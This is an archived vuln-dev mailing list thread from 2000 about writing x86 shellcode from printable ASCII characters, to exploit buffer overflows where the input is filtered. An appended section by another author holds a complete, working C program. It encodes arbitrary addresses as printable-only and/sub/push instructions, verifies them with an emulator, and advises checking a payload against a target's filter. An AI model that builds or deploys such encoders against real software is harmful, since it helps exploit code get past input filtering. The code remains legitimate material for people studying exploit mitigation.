Vulnerability Development mailing list archives

Re: Ascii-x86 was: Blind Remote Buffer Overflow


From: robert.collins () ITDOMAIN COM AU (Robert Collins)
Date: Thu, 4 May 2000 10:45:26 +1000


FWIW, I recall that in DOS there was an ability to hold down Alt and use the
numeric keypad to enter character codes directly,

i.e. Alt-1,2,7 resulted in ASCII 127 being sent to the application....

Rob
----- Original Message -----
From: "Bluefish" <11a () GMX NET>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Thursday, 4 May 2000 6:06
Subject: Ascii-x86 was: Blind Remote Buffer Overflow

I've written some code earlier in my life to be usable with the MS-DOS
'copy con: file.com' feature. My opinion is that for most situations
it's possible without too much work. (*Never rely on this being 'hard' to
do!*)

To begin with, you are rarely limited to 7-bit ASCII (unless your shellcode
is being filtered). In fact you can often use a whole lot of 8-bit
characters. That it cannot be printed is no guarantee, e.g. you can
sometimes supply low ASCII characters using the Ctrl key.

Additionally, regarding stuff being out of range! You have to keep in mind
that several of the jump codes can be replaced with synonyms. If you
can't supply a CALL, your attacker might use PUSH/JMP or PUSH/PUSH/RET to
simulate it, etc.

I doubt any developer actually relies on this being impossible, but I just
wanted to stress the fact that a fix for an overflowable but filtered
buffer should be as important to provide quickly as one for an unfiltered
one. Because what might seem hard to do might be hard to do - but some
lunatic might stay up for 36 hours working only on the problem, and a few
days later the exploit might be widely available and actively exploited.

(Possible scenarios could be the old XFree86 and the Win98 LFN buffer
overflows, where the attacker is limited to printable characters. Or any
computer system where you can create executables but haven't got a hex
editor or compiler to create them the common ways...)

Cheers,
  B.F.

..:::::::::::::::::::::::::::::::::::::::::::::::::..
     http://www.11a.nu || http://bluefish.11a.nu
    eleventh alliance development & security team
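An added worked example (mine, not code from either poster in this thread): the
"synonyms" point above generalises from replacing CALL with PUSH/JMP to building
any dword out of printable-only x86 instructions, so that an address full of
high or low bytes can still be pushed on the stack through a filter that only
passes 0x21-0x7e. The encoder below uses three real opcodes that happen to be
printable characters (0x25 '%' = and eax,imm32; 0x2d '-' = sub eax,imm32;
0x50 'P' = push eax): two masks whose AND is zero clear eax, then three
subtractions with printable immediates reach the wanted value, solved one byte
at a time with an explicit carry. The allowed byte range, the two masks, the
sample address 0xbffff9c0 and the small emulator used to check the result are
my own assumptions and constructions for the demo, not anything from the thread.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed filter: printable 7-bit ASCII without space. A real filter may also
 * drop quotes, '/', etc.; tighten LO/HI (or is_allowed) to match the target. */
#define LO 0x21
#define HI 0x7e

/* x86 opcodes used; each is itself a printable character. */
#define OP_AND_EAX  0x25  /* '%'  and eax, imm32 */
#define OP_SUB_EAX  0x2d  /* '-'  sub eax, imm32 */
#define OP_PUSH_EAX 0x50  /* 'P'  push eax       */

/* Two printable masks whose bitwise AND is zero: anding eax with both clears it. */
#define MASK1 0x554e4d4au  /* little-endian bytes 4a 4d 4e 55 = "JMNU" */
#define MASK2 0x2a313235u  /* little-endian bytes 35 32 31 2a = "521*" */

static int is_allowed(uint8_t b) { return b >= LO && b <= HI; }

/* Index of the first byte a printable-only filter would drop, or -1 if clean. */
int first_filtered_byte(const uint8_t *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (!is_allowed(code[i]))
            return (int)i;
    return -1;
}

/* Split a sum s in [3*LO, 3*HI] into three bytes, each in [LO, HI]. */
static void split3(int s, uint8_t *a, uint8_t *b, uint8_t *c)
{
    int x = s - 2 * LO;  if (x > HI) x = HI;   /* leave room for two minimum bytes */
    int rem = s - x;
    int y = rem - LO;    if (y > HI) y = HI;
    *a = (uint8_t)x; *b = (uint8_t)y; *c = (uint8_t)(rem - y);
}

static void put_le32(uint8_t *out, uint32_t v)
{
    out[0] = (uint8_t)v;         out[1] = (uint8_t)(v >> 8);
    out[2] = (uint8_t)(v >> 16); out[3] = (uint8_t)(v >> 24);
}

/* Emit  and eax,MASK1 ; and eax,MASK2 ; sub eax,A ; sub eax,B ; sub eax,C ; push eax
 * using only bytes in [LO,HI], so that the pushed dword equals target. With eax
 * cleared by the masks we need A+B+C == -target (mod 2^32); each byte of that
 * sum is split into three printable bytes, carrying into the next byte when the
 * required value is too small for three bytes >= LO. Returns bytes written (26). */
size_t encode_printable_push(uint32_t target, uint8_t *out)
{
    uint32_t need = 0u - target;
    uint8_t a[4], b[4], c[4];
    int carry = 0;
    for (int i = 0; i < 4; i++) {
        int s = (int)((need >> (8 * i)) & 0xff) - carry;  /* what the three bytes must sum to */
        carry = 0;
        if (s < 3 * LO) { s += 256; carry = 1; }          /* borrow a carry from this byte */
        split3(s, &a[i], &b[i], &c[i]);
    }
    size_t n = 0;
    out[n++] = OP_AND_EAX;  put_le32(out + n, MASK1); n += 4;
    out[n++] = OP_AND_EAX;  put_le32(out + n, MASK2); n += 4;
    out[n++] = OP_SUB_EAX;  memcpy(out + n, a, 4);   n += 4;
    out[n++] = OP_SUB_EAX;  memcpy(out + n, b, 4);   n += 4;
    out[n++] = OP_SUB_EAX;  memcpy(out + n, c, 4);   n += 4;
    out[n++] = OP_PUSH_EAX;
    return n;
}

/* Tiny interpreter for the three instruction forms above, to check the encoder
 * without executing anything. eax deliberately starts as garbage, since the
 * mask pair must clear it. Returns 0 and the last pushed dword, else -1. */
int emulate_push_sequence(const uint8_t *code, size_t len, uint32_t *pushed)
{
    uint32_t eax = 0xdeadbeefu;
    int pushed_any = 0;
    for (size_t i = 0; i < len; ) {
        if (code[i] == OP_PUSH_EAX) { *pushed = eax; pushed_any = 1; i += 1; continue; }
        if (i + 5 > len) return -1;
        uint32_t imm = (uint32_t)code[i + 1] | ((uint32_t)code[i + 2] << 8)
                     | ((uint32_t)code[i + 3] << 16) | ((uint32_t)code[i + 4] << 24);
        if (code[i] == OP_AND_EAX)      eax &= imm;
        else if (code[i] == OP_SUB_EAX) eax -= imm;
        else return -1;
        i += 5;
    }
    return pushed_any ? 0 : -1;
}

/* 1 if target encodes to filter-clean bytes that really push target back. */
int roundtrip_ok(uint32_t target)
{
    uint8_t buf[32];
    uint32_t got;
    size_t n = encode_printable_push(target, buf);
    return first_filtered_byte(buf, n) == -1
        && emulate_push_sequence(buf, n, &got) == 0 && got == target;
}

int main(void)
{
    uint32_t target = 0xbffff9c0u;   /* constructed stack-like address, 3 unprintable bytes */
    uint8_t buf[32];
    size_t n = encode_printable_push(target, buf);
    printf("push 0x%08x as %u printable bytes: %.*s\n", target, (unsigned)n, (int)n, (const char *)buf);
    printf("roundtrip: %s\n", roundtrip_ok(target) ? "ok" : "FAILED");
    /* By contrast a plain 'call rel32' (e8 xx xx xx xx) is dropped at its first byte. */
    const uint8_t call_rel32[5] = { 0xe8, 0, 0, 0, 0 };
    printf("call rel32 first filtered byte: %d\n", first_filtered_byte(call_rel32, 5));
    return 0;
}
```

Run first_filtered_byte over a candidate payload with the target's real allowed
set before spending time on it; the encoder's 0x21-0x7e range is the easy case,
and a stricter filter (alphanumeric only, say) needs a different split3 and
different masks, but the same and/sub/push idea.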


